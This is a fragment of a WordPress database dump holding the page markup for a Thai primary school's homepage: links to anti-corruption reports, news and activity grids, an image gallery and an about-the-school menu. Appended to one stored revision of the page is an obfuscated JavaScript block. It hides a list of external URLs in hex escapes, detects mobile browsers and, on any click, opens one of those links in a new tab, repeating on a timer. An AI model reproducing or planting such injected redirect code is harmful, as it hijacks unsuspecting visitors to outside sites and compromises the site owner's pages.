style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 12:08:21','2024-07-27 05:08:21','',14,'http://pakhaeng.ssk.in.th/?p=133',0,'revision','',0),
(134,1,'2024-07-27 12:09:07','2024-07-27 05:09:07','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span 